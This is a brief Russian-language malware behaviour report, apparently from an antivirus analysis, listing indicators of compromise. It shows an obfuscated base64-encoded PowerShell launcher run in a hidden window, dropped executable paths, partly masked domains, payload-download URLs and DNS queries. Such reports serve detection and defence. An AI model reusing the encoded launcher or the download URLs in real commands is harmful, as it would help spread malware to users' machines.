Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABLAHgAMQA5ADgAdABjAD0AKAAoACcATABrACcAKwAnAG0AJwApACsAJwA3ACcAKwAoACcAYwAnACsAJwBoAGsAJwApACkAOwAmACgAJwBuACcAKwAnAGUAdwAtAGkAdABlACcAKwAnAG0AJwApACAAJABFAE4AdgA6AHUAUwBFAHIAUABSAE8AZgBpAG...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1580
- %TEMP%\1142473.cvr
- %HOMEPATH%\lchrk0d\ju3l9ah\cvkwsu7_2.exe
- %HOMEPATH%\lchrk0d\ju3l9ah\cvkwsu7_2.exe
- %HOMEPATH%\lchrk0d\ju3l9ah\cvkwsu7_2.exe
- 'mm###ring.de':80
- 'mu###ersum.com':80
- 'sc##ink.net':80
- 'we####gansbergen.de':80
- 'ne####hnology.info':80
- 'le####at-rauthe.de':80
- http://mm###ring.de/alt-strato/ENQnQbMFcyz/
- http://mu###ersum.com/cgi-bin/attach/wJmPmWFZRU/
- http://sc##ink.net/file/file/AYcTpgPvKrjnc/
- http://we####gansbergen.de/cgi-bin/file/dnxsUNfow/
- http://ne####hnology.info/cgi-bin/C6wBSadg9e0313/
- http://le####at-rauthe.de/cgi-bin/oiwqqIFJcs/
- DNS ASK mm###ring.de
- DNS ASK mu###ersum.com
- DNS ASK sc##ink.net
- DNS ASK we####gansbergen.de
- DNS ASK my##buch.de
- DNS ASK ne####hnology.info
- DNS ASK le####at-rauthe.de
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABLAHgAMQA5ADgAdABjAD0AKAAoACcATABrACcAKwAnAG0AJwApACsAJwA3ACcAKwAoACcAYwAnACsAJwBoAGsAJwApACkAOwAmACgAJwBuACcAKwAnAGUAdwAtAGkAdABlACcAKwAnAG0AJwApACAAJABFAE4AdgA6AHUAUwBFAHIAUABSAE8AZgBpAG...' (со скрытым окном)